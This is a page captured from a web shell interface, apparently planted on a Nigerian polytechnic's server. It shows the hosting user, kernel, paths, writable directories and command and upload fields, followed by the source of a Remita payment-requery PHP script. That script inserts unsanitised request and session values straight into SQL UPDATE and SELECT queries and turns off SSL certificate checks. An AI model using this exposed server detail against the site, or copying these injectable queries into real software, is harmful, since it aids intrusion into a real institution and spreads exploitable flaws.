403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.58.211
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/reQueryForm.php
<?php
session_start();
$matNo=$_SESSION['transID'];
ob_start();
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 2016-03-24
 * Time: 05:51 PM
 */
include('headMain2.php');
require 'remita_constants.php';
$orderID = "";
if( isset( $_GET['id'] )) {
    $orderID = $_GET['id'];
    $ptype=$_GET['ptype'];

}
$response_code ="";
$rrr = "";
$response_message = "";
			//Verify Transaction
function remita_transaction_details($orderId){
    $mert =  MERCHANTID;
    $api_key =  APIKEY;
    $concatString = $orderId . $api_key . $mert;
    $hash = hash('sha512', $concatString);
    $url 	= CHECKSTATUSURL . '/' . $mert  . '/' . $orderId . '/' . $hash . '/' . 'orderstatus.reg';
    //  Initiate curl
    $ch = curl_init();
    // Disable SSL verification
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    // Will return the response, if false it print the response
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Set the url
    curl_setopt($ch, CURLOPT_URL,$url);
    // Execute
    $result=curl_exec($ch);
    // Closing
    curl_close($ch);
    $result;
    $response = json_decode($result, true);
    return $response;
}
	if($orderID !=null){
        $response = remita_transaction_details($orderID);
        $response_code = $response['status'];
        if (isset($response['RRR']))
        {
            $rrr = $response['RRR'];
        }
        $response_message = $response['message'];
        $transactiontime= $response['transactiontime'];
        $RRR= $response['RRR'];
        $status= $response['status'];
        $message= $response['message'];
        if (($status=='00') or ($status=='01')){
            $transA='True';
        }else{
            $transA='False';
        }
        require_once('../connect.php');
        $db=db_connect();
        require('../filetoU/logFile.php');
        $logD='Requerying.  OrderID: '.$orderID.' RRR: '.$RRR;
        logDetail($matNo,$logD);
        $db->query("UPDATE `fedpoly`.`remitaorderform` SET `remitaRRR` = '$RRR',`transDate` = '$transactiontime',`transStatus` = '$status',`transDetail` = '$message',`transApproved` = '$transA' WHERE `remitaorderform`.`orderID` ='$orderID'");
       //============================================
       if($status == '01' || $status == '00') {
           $dept=$_SESSION['dept'];

    if ($dept < 10) {
        $deptCode = '0' . $dept;
    } else {
        $deptCode = $dept;
    }

//end department code generation

//generate Form type Code
           if ($ptype == 'utmeForm') {
               $formCode = '1';
           } elseif ($ptype == 'hndForm') {
               $formCode = '3';
           } elseif ($ptype == 'preForm') {
               $formCode = '5';
           } elseif ($ptype == 'ptForm') {
               $formCode = '4';
           } elseif ($ptype == 'dptForm') {
               $formCode = '2';
           }
//End of Form type Code

//generate serial Number

    $matSQL = "select * from entrancetable where formNo<>''";
    $matResult = $db->query($matSQL);
    $matNum = $matResult->rowCount();
    if ($matNum >= 0) {
        $realNo = $matNum + 1;
        if ($realNo < 10) {
            $serialNo = '0000' . $realNo;
        } elseif ($realNo < 100) {
            $serialNo = '000' . $realNo;
        } elseif ($realNo < 1000) {
            $serialNo = '00' . $realNo;
        } elseif ($realNo < 10000) {
            $serialNo = '0' . $realNo;
        } else {
            $serialNo = $realNo;
        }


        $entranceUpdate = $db->query("select * from remitaorderform where orderID='$orderID'");
        $entranceUpdate_fetch = $entranceUpdate->fetch(PDO::FETCH_BOTH);
        $transCode = $entranceUpdate_fetch['regNo'];
       // echo $transCode;
       // echo $matNo;
        //die();
        if ($transCode == $matNo) {
            $newMatNo = '18' . $formCode . $deptCode . $serialNo;
            //mysql_query("UPDATE `fedpoly`.`realdataform` SET `matNo` = '$newMatNo',`usernamea` = '$newMatNo',`passworda` = '$newMatNo',`fresher` = '10' WHERE `realdataform`.`formNo` ='$matNo'");
            $db->query("UPDATE `fedpoly`.`remitaorderform` SET `regNo` = '$newMatNo' WHERE `remitaorderform`.`orderID` ='$orderID'");
            $db->query("UPDATE `fedpoly`.`entrancetable` SET `formNo` = '$newMatNo' WHERE `entrancetable`.`transID` ='$transCode'");
            // $_SESSION['matNo'] = $newMatNo;
            //echo '<font color="#FF0000"><h2><br> Note: Your form Number is ' . $newMatNo . '</h2></font>';
        }
    }
}
    //==========================================


        header('location:'.'paymentHistoryForm.php');
    }
include('footMain.php');
ob_end_flush();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit